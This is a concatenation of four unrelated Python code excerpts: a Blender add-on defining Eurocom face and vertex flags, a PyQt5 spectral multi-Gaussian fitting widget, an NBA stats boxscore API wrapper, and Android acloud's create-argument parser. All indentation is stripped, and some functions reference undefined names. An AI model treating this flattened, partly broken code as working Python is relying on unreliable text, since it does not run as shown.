if cur_sel_object != last_sel_object:
last_sel_indexes = False
if cur_sel_indexes == last_sel_indexes:
return
last_sel_object = cur_sel_object
last_sel_indexes = cur_sel_indexes
# --
if in_vtx_sel_mode:
selected = bitfield_to_enum_property(context.active_object.data.euroland, 'vertex_flags', thing)
if context.active_object.data.euroland.vertex_flags != selected:
context.active_object.data.euroland.vertex_flags = set((i.identifier) for i in selected)
context.active_object.data.euroland.vertex_flags.update()
elif in_fac_sel_mode:
selected = bitfield_to_enum_property(context.active_object.data.euroland, 'face_flags', thing)
if context.active_object.data.euroland.face_flags != selected:
context.active_object.data.euroland.face_flags = set((i.identifier) for i in selected)
context.active_object.data.euroland.face_flags.update()
return
def update_after_enum(self, context):
print('self.face_flags ---->', self.face_flags)
class EuroProperties(bpy.types.PropertyGroup):
''' Per-face bitfield for Euroland entities. '''
face_flags: bpy.props.EnumProperty(
name = "Eurocom face flags",
options = {'ENUM_FLAG'},
items = [
# swy: configurable per-project flags
("", "Project Flags", ""),
("0x0001", "Water / NoJump (line seg.)", "0x0001"),
("0x0002", "UnderWater / Ladder (line seg. and line poly)", "0x0002"),
("0x0004", "Slippery (line poly) / Wall (line seg.) / NoDive (normal poly)", "0x0004"),
("0x0008", "Moveable / Edge (line seg.)", "0x0008"),
(None),
("0x0010", "Riser / ZipHandle (grab poly)", "0x0010"),
("0x0020", "No Camera Collision", "0x0020"),
("0x0040", "No Char Lighting", "0x0040"),
("0x0080", "User Flag8", "0x0080"),
(None),
("0x0100", "DualSide Collision", "0x0100"),
("0x0200", "Flag10", "0x0200"),
("0x0400", "No Dynamic Lighting", "0x0400"),
("0x0800", "No Dynamic Shadows", "0x0800"),
(None),
("0x1000", "No Cast Shadows", "0x1000"),
("0x2000", "Dont BSP Poly", "0x2000"),
("0x4000", "BSP Only Poly", "0x4000"),
("0x8000", "Flag16", "0x8000"),
# swy: hardcoded Euroland flags
("", "Hardcoded Flags", ""),
("0x00010000", "Not backface culled", "0x00010000"),
("0x00020000", "Portal", "0x00020000"),
("0x00040000", "Invisible", "0x00040000"),
("0x00080000", "Line segment", "0x00080000"),
(None),
("0x00100000", "Facetted", "0x00100000"),
("0x00200000", "Clip Portal", "0x00200000"),
("0x01000000", "No collision", "0x01000000"),
("0x02000000", "Always backface culled", "0x02000000")
],
default = set(),
update = update_after_enum
)
vertex_flags: bpy.props.EnumProperty(
name = "Eurocom vertex flags",
options = {'ENUM_FLAG'},
items = [
# swy: configurable per-project flags
("", "Project Flags", ""),
("0x0001", "Soft Skin Normal", "0x0001"),
("0x0002", "Flag2", "0x0002"),
("0x0004", "Flag3", "0x0004"),
("0x0008", "Flag4", "0x0008"),
(None),
("0x0010", "Flag5", "0x0010"),
("0x0020", "Flag6", "0x0020"),
("0x0040", "Flag7", "0x0040"),
("0x0080", "Flag8", "0x0080"),
(None),
("0x0100", "User Flag 1", "0x0100"),
("0x0200", "User Flag 2", "0x0200"),
("0x0400", "User Flag 3", "0x0400"),
("0x0800", "User Flag 4", "0x0800"),
(None),
("0x1000", "Cloth Handrail", "0x1000"),
("0x2000", "Cloth Breakpoint", "0x2000"),
("0x4000", "Cloth Vertex", "0x4000"),
("0x8000", "Fixed Cloth Vertex", "0x8000"),
],
default = set(),
update = update_after_enum
)
# swy: use a callback function to iterate across the whole thing,
# works with | |
from PyQt5.QtWidgets import QWidget, QGridLayout, QVBoxLayout, QComboBox, QLineEdit, QLabel, QPushButton, QDialog, QCheckBox
from PyQt5.QtCore import Qt, pyqtSignal
from PyQt5.QtGui import QDoubleValidator
from PyQt5 import QtWidgets
import matplotlib
matplotlib.use('Qt5Agg')
from matplotlib.backends.backend_qt5agg import FigureCanvasQTAgg
from matplotlib.figure import Figure
from matplotlib.backends.backend_qt5agg import NavigationToolbar2QT as NavigationToolbar
import numpy as np
import pandas as pd
from scipy.interpolate import splrep, splev
from scipy.optimize import curve_fit
from IGM.rb_setline import read_line_list
class Gaussfit_2d(QWidget):
send_linelist = pyqtSignal(object)
send_lineindex = pyqtSignal(int)
send_waves = pyqtSignal(object)
send_gfinal = pyqtSignal(list)
send_ransac = pyqtSignal(object)
def __init__(self,wave, flux1d,error1d, gauss_num=2, linelists=[]):
super().__init__()
self.gauss_num = gauss_num
self.waves = np.array([-1] * gauss_num)
self.names = np.array([None] * gauss_num)
self.linelists = linelists
self.result = None
self.wave, self.flux1d, self.error1d = wave, flux1d, error1d
self.kernel_size = 149
self.cont = None
self.c = None # placeholder for ransac cont_fitter object
layout = QVBoxLayout()
# sublayout for Guess z functions
lines_layout = QGridLayout()
lines_layout.addWidget(QLabel('Linelist'), 0,0)
self.line_combo = QComboBox()
self.line_combo.setFixedWidth(120)
self.line_combo.addItems(self.linelists)
lines_layout.addWidget(self.line_combo, 1, 0)
l_zf = QLabel('Estimated z')
l_zf.setFixedHeight(20)
lines_layout.addWidget(l_zf, 0, 1)
self.zf = QLineEdit()
self.zf.setPlaceholderText('Redshift')
self.zf.setFixedWidth(100)
self.zf.setReadOnly(True)
lines_layout.addWidget(self.zf, 1,1)
l_zferr = QLabel('Estimated Error')
l_zferr.setFixedHeight(20)
lines_layout.addWidget(l_zferr, 0, 2)
self.zferr = QLineEdit()
self.zferr.setPlaceholderText('Error')
self.zferr.setFixedWidth(100)
self.zferr.setReadOnly(True)
lines_layout.addWidget(self.zferr, 1,2)
pb = QPushButton('Fit')
pb.setFixedWidth(100)
pb.clicked.connect(self._button_clicked)
lines_layout.addWidget(pb, 1,3)
self.fit_result = QLabel('Ready')
lines_layout.addWidget(self.fit_result, 0, 3)
adv_pb = QPushButton('Advanced')
adv_pb.setFixedWidth(100)
adv_pb.clicked.connect(self._adv_button_clicked)
lines_layout.addWidget(adv_pb, 2,3)
apply_pb = QPushButton('Apply')
apply_pb.setFixedWidth(100)
apply_pb.clicked.connect(self._apply_button_clicked)
lines_layout.addWidget(apply_pb, 3,3)
ion1 = self._create_linelist_widget(lines_layout, 0)
ion2 = self._create_linelist_widget(lines_layout, 1)
ion_widgets = [ion1, ion2]
if self.gauss_num > 2:
ion3 = self._create_linelist_widget(lines_layout, 2)
ion_widgets.append(ion3)
self.line_combo.currentTextChanged.connect(lambda s, iw=ion_widgets: self._linelist_changed(s, iw))
ion1.currentIndexChanged.connect(lambda idx, iw=ion_widgets: self._auto_populate_ions(idx, iw))
self.line1d = LineCanvas()
self.line1d._plot_spec(wave,flux1d, error1d)
mpl_toolbar = NavigationToolbar(self.line1d, self)
self.send_waves.connect(self.line1d._on_sent_waves)
# --- possible implementation ---
# right now it is unstable if linetools is not installed
c_checkbox = QCheckBox('RANSAC')
# apply ransac fitting for continuum if checked
c_checkbox.stateChanged.connect(self._initialize_ransac)
lines_layout.addWidget(c_checkbox, 0, 4)
lines_layout.addWidget(QLabel('Kernel Size'), 1, 4)
self.kernel_ransac = QLineEdit()
self.kernel_ransac.setPlaceholderText('Kernel Size')
self.kernel_ransac.setReadOnly(True)
self.kernel_ransac.setFixedWidth(100)
self.kernel_ransac.returnPressed.connect(self._fit_ransac_continuum)
lines_layout.addWidget(self.kernel_ransac, 2, 4)
cont_pb = QPushButton('Export')
cont_pb.setFixedWidth(100)
cont_pb.clicked.connect(self._export_button_clicked)
lines_layout.addWidget(cont_pb, 3,4)
# main layout
layout.addWidget(mpl_toolbar)
layout.addWidget(self.line1d)
layout.addLayout(lines_layout)
self.setLayout(layout)
self.setFixedSize(1200,800)
def _create_linelist_widget(self, sublayout, col):
l_ion = QLabel('Ion {}'.format(col+1))
l_ion.setFixedHeight(20)
sublayout.addWidget(l_ion, 2, col)
ion_i = QComboBox()
ion_i.setFixedWidth(150)
ion_i.addItem('NONE')
ion_i.setCurrentIndex(0)
ion_i.currentIndexChanged.connect(lambda idx, ion_widget_idx=col: self._ion_i_index_changed(idx, ion_widget_idx))
sublayout.addWidget(ion_i, 3, col)
return ion_i
def _get_linelist_df(self, linelist_name):
llist = pd.DataFrame(columns=['wave', 'name'])
tmp = read_line_list(linelist_name)
#need a line to append wrest to name if it doesn't have one
if any(map(str.isdigit, tmp[1]['ion'])):
# if name column has wrest
for li in tmp:
newrow = {'wave': li['wrest'], 'name': li['ion']}
llist = llist.append(newrow, ignore_index=True)
else:
# if name column doesn't have wrest, need to append
for li in tmp:
newrow = {'wave': li['wrest'], 'name': li['ion']+' '+str(round(li['wrest']))}
llist = llist.append(newrow, ignore_index=True)
return llist
def _on_sent_gauss_num(self, sent_gauss_num):
self.gauss_num = int(sent_gauss_num)
print(self.gauss_num)
ion3 = self._create_linelist_widget(lines_layout, 4)
ion_widgets.append(ion3)
def _ion_i_index_changed(self, i, ion_widget_idx): # i is an int
#self.send_lineindex.emit(i)
if i > 0:
self.waves[ion_widget_idx] = self.linelist.at[i-1, 'wave']
self.names[ion_widget_idx] = self.linelist.at[i-1, 'name']
#print(self.waves)
#print(self.names)
if sum(self.waves > 0) == self.gauss_num:
# now waves contain all selected ion rest wavelength
self.send_waves.emit({ni:wi for ni,wi in zip(self.names, self.waves)})
def _on_sent_linelists2multiG(self, l):
self.LINELISTS = l
def _linelist_changed(self, s, ion_widgets):
for ion_i in ion_widgets:
if s in 'NONE':
self.send_linelist.emit(s)
ion_i.clear()
ion_i.addItem('NONE')
ion_i.setCurrentIndex(0)
else:
self.linelist = self._get_linelist_df(s)
ion_i.clear()
ion_i.addItems(['ALL'] + self.linelist['name'].tolist())
self.send_linelist.emit(self.linelist)
ion_i.setCurrentIndex(0)
#print(self.linelist)
def _button_clicked(self, check):
show_sigfig = 5
print('Begin fitting multiple Gaussians')
self.result = self.line1d.fit(self.cont)
if self.result is not None:
self.zf.setText(str(self.round_to_sigfig(self.result[0], show_sigfig)))
self.zferr.setText(str(self.round_to_sigfig(self.result[1], show_sigfig)))
self.fit_result.setText('Success!')
self.fit_result.setStyleSheet('QLabel {color: #000000}')
else:
self.zf.setText('0')
self.zferr.setText('0')
self.fit_result.setText('Failure!')
self.fit_result.setStyleSheet('QLabel {color: #FF0000}')
self.result = None
def _apply_button_clicked(self, check):
if self.result is not None:
self.send_gfinal.emit(self.result)
def round_to_sigfig(self, num=0., sigfig=1):
if np.isinf(float(num)):
return np.inf
else:
return round(num, sigfig - int(np.floor(np.log10(abs(num)))) - 1)
def _adv_button_clicked(self, check):
print('Change parameter bounds')
if (self.line1d.bounds is None) | (self.line1d.init_guess is None):
print('Please Press Fit button first')
else:
constraint = FittingConstraintDialog(init_guess=self.line1d.init_guess,
bounds=self.line1d.bounds)
if constraint.exec_():
(new_guess, new_bd_low, new_bd_up) = constraint._getvals()
self.line1d.bounds = [new_bd_low, new_bd_up]
self.line1d.init_guess = new_guess
def _fit_ransac_continuum(self):
self.kernel_size = int(self.kernel_ransac.text())
if self.kernel_size % 2 == 0:
self.kernel_size += 1
self.c.fit_continuum(window=self.kernel_size)
self.line1d.axline.lines.pop()
self.line1d.axline.plot(self.wave, self.c.cont, 'b')
self.line1d.draw()
self.cont = self.c.cont
def _initialize_ransac(self, s):
# if the checkbox is checked, initialize ransac
if s == Qt.Checked:
self.kernel_ransac.setReadOnly(False)
self.kernel_ransac.setText(str(self.kernel_size))
from IGM.ransac_contfit import cont_fitter
self.c = cont_fitter.from_data(self.wave, self.flux1d, error=self.error1d)
self.c.fit_continuum(window=self.kernel_size)
self.line1d.axline.plot(self.wave, self.c.cont, 'b')
self.line1d.draw()
self.cont = self.c.cont
else:
self.kernel_ransac.setReadOnly(True)
self.kernel_ransac.clear()
self.cont = None
del self.line1d.axline.lines[2:]
def _export_button_clicked(self, check):
if self.cont is not None:
self.send_ransac.emit([self.wave,self.cont])
def _auto_populate_ions(self, i, ion_widgets):
len_items = ion_widgets[0].count()
if len(ion_widgets) < 3:
# double Gaussian
if i+1 < len_items:
ion_widgets[-1].setCurrentIndex(i+1)
else:
ion_widgets[-1].setCurrentIndex(i)
else:
# triple Gaussian
if i+2 > len_items:
ion_widgets[1].setCurrentIndex(i)
ion_widgets[2].setCurrentIndex(i)
if i+2 == len_items:
ion_widgets[1].setCurrentIndex(i+1)
ion_widgets[2].setCurrentIndex(i+1)
else:
ion_widgets[1].setCurrentIndex(i+1)
ion_widgets[2].setCurrentIndex(i+2)
class LineCanvas(FigureCanvasQTAgg):
def __init__(self, parent=None, width=5, height=3, dpi=100):
self.fig = Figure(figsize=(width, height), dpi=dpi)
self.fig.subplots_adjust(left=0.1, bottom=0.1, right=0.9, top=0.9)
super().__init__(self.fig)
self.fig.canvas.setFocusPolicy(Qt.ClickFocus)
self.fig.canvas.setFocus()
self.cid_k = self.fig.canvas.mpl_connect('key_press_event', self.ontype)
# initialization of selected ion wavelength
# will receive updated wavelength once all ions have been selected
self.wavelist = []
self.names = []
self.init_guess = None
self.bounds = None
self.z_guess = 0.
def _plot_spec(self, wave,flux1d,error1d):
self.axline = self.fig.add_subplot(111)
self.axline.cla()
self.axline.plot(wave,flux1d,'k', alpha=0.8)
self.axline.plot(wave,error1d,'r', alpha=0.8)
self.g_wave, self.g_flux, self.g_error = wave, flux1d, error1d
self.axline.set_ylim([np.min(flux1d)*0.8, np.max(flux1d)*1.3])
self.axline.set_xlabel('Wavelength')
self.axline.set_title('Fit Gaussians')
self.draw()
def _plot_line(self, wave_obs):
ax = self.fig.gca()
xlim, ylim = ax.get_xlim(), ax.get_ylim()
self._clear_plotted_lines()
self.z_guess = wave_obs/self.wavelist[0] - 1
self.waves_guess = self.wavelist * (1 + self.z_guess)
self.axline.vlines(x=self.waves_guess,
ymin=ylim[0], ymax=ylim[-1], color='blue', linestyle='dashed')
for i in range(len(self.waves_guess)):
self.axline.text(x=self.waves_guess[i],
y=ylim[-1]*0.6,
s=self.names[i],
color='blue', fontsize=12, rotation='vertical')
self.axline.set_xlim(xlim)
self.axline.set_ylim(ylim)
self.draw()
def _clear_plotted_lines(self):
while self.axline.texts:
self.axline.texts.pop()
while self.axline.collections:
self.axline.collections.pop()
del self.axline.lines[2:]
self.draw()
def fit(self, ransac_cont=None):
print('Start fitting multi-Gaussian profile...')
# mimic the single Gaussian fitting process
# 1. fit a local continum across the entire window
if ransac_cont is None:
spline = splrep([self.g_wave[0], self.g_wave[-1]],
[self.g_flux[0], self.g_flux[-1]],
k=1)
cont = splev(self.g_wave, spline)
else:
cont = ransac_cont
# 2. only fit emission lines or absorption lines at once
EW = np.sum(cont - self.g_flux)
if EW > 0:
# all lines are absorption lines
sign = -1
else:
# all emission lines
sign = 1
# initialize guessed values
if self.init_guess is None:
sig_guess = [20] * len(self.waves_guess)
# intialize amp's from sliced spectrum
amp_guess = []
for wi in self.waves_guess:
amp_guess.append(self.g_flux[self.g_wave < wi][-1])
#amp_guess = [3] * len(self.waves_guess)
p_guess = [self.z_guess] + sig_guess + amp_guess
self.init_guess = p_guess.copy()
else:
p_guess = self.init_guess
# prepare ydata for fit
ydata = sign * (self.g_flux - cont)
errdata = sign * (self.g_error - cont)
# start fitting process
model_guess = MultiGauss(self.wavelist)
if self.bounds is None:
SoL = 299792.458 #km/s
v_uncer = 1000 # km/s
beta = v_uncer/SoL
delz = np.sqrt((1.+beta)/(1.-beta)) - 1.
self.bd_low = [self.z_guess-delz] + [0] * ((len(p_guess)-1)//2) + (np.array(amp_guess)*0.5).tolist()
self.bd_up = [self.z_guess+delz] + [100] * ((len(p_guess)-1)//2) + (np.array(amp_guess)*1.5).tolist()
self.bounds = [self.bd_low, self.bd_up]
else:
self.bd_low, self.bd_up = self.bounds[0], self.bounds[-1]
# if we want to use errdata for estimation
# No errdata
try:
#popt, pcov = curve_fit(model_guess.compile_model, self.g_wave, ydata,
# p0=p_guess, bounds=(bd_low, bd_up))
# With errdata
popt, pcov = curve_fit(model_guess.compile_model, self.g_wave, ydata,
p0=p_guess, bounds=(self.bd_low, self.bd_up), sigma=errdata)
# interpolate with the model parameters
gfinal = sign * model_guess.compile_model(self.g_wave, *popt) + cont
perr = np.sqrt(np.diag(pcov))
# do not forget to bring back to observed frame
del self.axline.lines[2:]
cont_fit = self.axline.plot(self.g_wave, cont, 'b')
model_fit = self.axline.plot(self.g_wave, gfinal, 'r--')
self.draw()
print('\nCurrent multi-Gaussian optimal parameters:')
print('-----------------------------------------')
print(f'z = {popt[0]:.4f}, error = {perr[0]:.4f}')
num_g = int(len(popt)-1) // 2
for i in range(1, num_g+1):
print(f'Sigma {i} = {popt[i]:.4f}, error = {perr[i]:.4f}')
print(f'Amp {i} = {popt[i+num_g]:.4f}, error = {perr[i+num_g]:.4f}')
print('-----------------------------------------')
return [popt[0], perr[0]]
except (RuntimeError, ValueError):
print('Fitting failed...')
return None
#------------------- Keyboards/Mouse Events------------------------
def ontype(self, event):
'''Interactivae keyboard events
Note:
Always Update to help mannual for new keyboard events
'''
#print(event.key)
if event.key == 'C':
# Pick the Gaussian Center
self.axline.plot(event.xdata,event.ydata,'r+')
self.g1x_init = event.xdata
self.g1y_init = event.ydata
print('Observed wavelength for Ion 1: {:.2f}'.format(event.xdata))
print('Fitted line wavelengths are ', event.xdata + self.delw)
self._plot_line(event.xdata)
self.draw()
# enable a few keyevent for navigation
elif event.key == 'r':
axline = self.figure.gca()
xlim, ylim = axline.get_xlim(), axline.get_ylim()
self.axline.lines[0] = self.axline.plot(wave,error1d,'r', alpha=0.8)
self.axline.lines[1] = self.axline.plot(wave,flux1d,'k', alpha=0.8)
self.axline.set_xlim(xlim)
self.axline.set_ylim(ylim)
elif event.key == 't':
ylim = self.axline.get_ylim()
self.axline.set_ylim([ylim[0], event.ydata])
self.draw()
elif event.key == 'b':
ylim = self.axline.get_ylim()
self.axline.set_ylim([event.ydata, ylim[-1]])
self.draw()
elif event.key == 'X':
xlim = self.axline.get_xlim()
self.axline.set_xlim([xlim[0], event.xdata])
self.draw()
elif event.key == 'x':
| |
from nba import enums
from nba.utils import clean_locals
from nba.endpoints.baseendpoint import BaseEndpoint
class Boxscores(BaseEndpoint):
def advanced(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get advanced box score stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: data for specified filters, as defined below by idx_data.
:rtype: Dataframe
======== ============ ==================================================
idx_data Name Description
======== ============ ==================================================
0 PlayerStats Advanced box scores on an individual player basis.
1 TeamStats Advanced box scores on a team basis.
======== ============ ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscoreadvancedv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def four_factors(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get four factors stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: four factors stats on team/player basis, as defined below by idx_data table.
:rtype: Dataframe
======== ====================== ==================================================
idx_data Name Description
======== ====================== ==================================================
0 sqlPlayersFourFactors Four factors stats on an individual player basis.
1 sqlTeamsFourFactors Four factors stats on a team basis.
======== ====================== ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscorefourfactorsv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def miscellaneous(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get miscellaneous stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: miscellaneous stats on team/player basis, as defined below by idx_data table.
:rtype: Dataframe
======== =============== ==================================================
idx_data Name Description
======== =============== ==================================================
0 sqlPlayersMisc Miscellaneous stats on an individual player basis.
1 sqlTeamsMisc Miscellaneous stats on a team basis.
======== =============== ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscoremiscv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def scoring(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get scoring stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: scoring stats on team/player basis, as defined below by idx_data table.
:rtype: Dataframe
======== ================== ==================================================
idx_data Name Description
======== ================== ==================================================
0 sqlPlayersScoring Scoring stats on an individual player basis.
1 sqlTeamsScoring Scoring stats on a team basis.
======== ================== ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscorescoringv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def traditional(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get traditional box score stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: traditional box scores on team/player/startvsbench basis, as defined below by idx_data table.
:rtype: Dataframe
======== ====================== ============================================================
idx_data Name Description
======== ====================== ============================================================
0 PlayerStats Traditional box scores on an individual player basis.
1 TeamStats Traditional box scores on a team basis.
2 TeamStarterBenchStats Traditional box scores on a starter vs bench split per team.
======== ====================== ============================================================
"""
params = clean_locals(locals())
endpoint = "boxscoretraditionalv2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def usage(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get usage stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: Usage stats on a player/team, as defined below by idx_data.
:rtype: Dataframe
======== ================ ==================================================
idx_data Name Description
======== ================ ==================================================
0 sqlPlayersUsage Usage stats on an individual player basis.
1 sqlTeamsUsage Usage stats on a team basis.
======== ================ ==================================================
"""
params = clean_locals(locals())
endpoint = "boxscoreusagev2"
r = self.request(endpoint, params)
df = self.process_response(r, idx_data, "resultSets")
return df
def summary(
self,
game_id,
idx_data,
start_period=enums.StartPeriod.Default,
end_period=enums.EndPeriod.Default,
start_range=enums.StartRange.Default,
end_range=enums.EndRange.Default,
range_type=enums.RangeType.Default,
):
"""
Get high level game summary stats for a given game.
:param game_id: id for the game to get data for.
:type game_id: str
:param idx_data: the index to retrieve data from json.
:type idx_data: int
:param start_period: filter starting quarter to retrieve data for.
:type start_period: nba.nba.bin.enums.StartPeriod
:param end_period: filter upper quarter cutoff for data.
:type end_period: nba.nba.bin.enums.EndPeriod
:param start_range: mandatory in url build, appear to have no effect.
:type start_range: nba.nba.bin.enums.StartRange
:param end_range: mandatory in url build, appear to have no effect.
:type end_range: nba.nba.bin.enums.EndRange
:param range_type: mandatory in url build, appear to have no effect.
:type range_type: nba.nba.bin.enums.RangeType
:returns: high level game information, as defined below by idx_data table below.
:rtype: Dataframe
======== ================ ==================================================
idx_data Name Description
======== ================ ==================================================
0 GameSummary High level overview of game information.
1 OtherStats Other high level game stats.
2 Officials Officials names and id's.
3 InactivePlayers Players not on roster for game.
4 GameInfo Date, attendance, time.
5 LineScore Scores by period.
6 LastMeeting Most recent meeting score and game info.
7 SeasonSeries Series results so far this season.
8 AvailableVideo Availability by video type.
======== ================ ==================================================
"""
params = clean_locals(locals())
| |
# Copyright 2018 - The Android Open Source Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
r"""Create args.
Defines the create arg parser that holds create specific args.
"""
import argparse
import os
from acloud import errors
from acloud.create import create_common
from acloud.internal import constants
from acloud.internal.lib import utils
_DEFAULT_GPU = "default"
CMD_CREATE = "create"
# TODO: Add this into main create args once create_cf/gf is deprecated.
def AddCommonCreateArgs(parser):
"""Adds arguments common to create parsers.
Args:
parser: ArgumentParser object, used to parse flags.
"""
parser.add_argument(
"--num",
type=int,
dest="num",
required=False,
default=1,
help="Number of instances to create.")
parser.add_argument(
"--serial-log-file",
type=str,
dest="serial_log_file",
required=False,
help="Path to a *tar.gz file where serial logs will be saved "
"when a device fails on boot.")
parser.add_argument(
"--autoconnect",
type=str,
nargs="?",
const=constants.INS_KEY_VNC,
dest="autoconnect",
required=False,
choices=[constants.INS_KEY_VNC, constants.INS_KEY_ADB,
constants.INS_KEY_WEBRTC],
help="Determines to establish a tunnel forwarding adb/vnc and "
"launch VNC/webrtc. Establish a tunnel forwarding adb and vnc "
"then launch vnc if --autoconnect vnc is provided. Establish a "
"tunnel forwarding adb if --autoconnect adb is provided. "
"Establish a tunnel forwarding adb and auto-launch on the browser "
"if --autoconnect webrtc is provided. For local goldfish "
"instance, create a window.")
parser.add_argument(
"--no-autoconnect",
action="store_false",
dest="autoconnect",
required=False,
help="Will not automatically create ssh tunnels forwarding adb & vnc "
"when instance created.")
parser.set_defaults(autoconnect=constants.INS_KEY_VNC)
parser.add_argument(
"--unlock",
action="store_true",
dest="unlock_screen",
required=False,
default=False,
help="This can unlock screen after invoke vnc client.")
parser.add_argument(
"--report-internal-ip",
action="store_true",
dest="report_internal_ip",
required=False,
help="Report internal ip of the created instance instead of external "
"ip. Using the internal ip is used when connecting from another "
"GCE instance.")
parser.add_argument(
"--network",
type=str,
dest="network",
required=False,
help="Set the network the GCE instance will utilize.")
parser.add_argument(
"--skip-pre-run-check",
action="store_true",
dest="skip_pre_run_check",
required=False,
help="Skip the pre-run check.")
parser.add_argument(
"--boot-timeout",
dest="boot_timeout_secs",
type=int,
required=False,
help="The maximum time in seconds used to wait for the AVD to boot.")
parser.add_argument(
"--wait-for-ins-stable",
dest="ins_timeout_secs",
type=int,
required=False,
help="The maximum time in seconds used to wait for the instance boot "
"up. The default value to wait for instance up time is 300 secs.")
parser.add_argument(
"--build-target",
type=str,
dest="build_target",
help="Android build target, e.g. aosp_cf_x86_phone-userdebug, "
"or short names: phone, tablet, or tablet_mobile.")
parser.add_argument(
"--branch",
type=str,
dest="branch",
help="Android branch, e.g. mnc-dev or git_mnc-dev")
parser.add_argument(
"--build-id",
type=str,
dest="build_id",
help="Android build id, e.g. 2145099, P2804227")
parser.add_argument(
"--kernel-build-id",
type=str,
dest="kernel_build_id",
required=False,
help="Android kernel build id, e.g. 4586590. This is to test a new"
" kernel build with a particular Android build (--build-id). If neither"
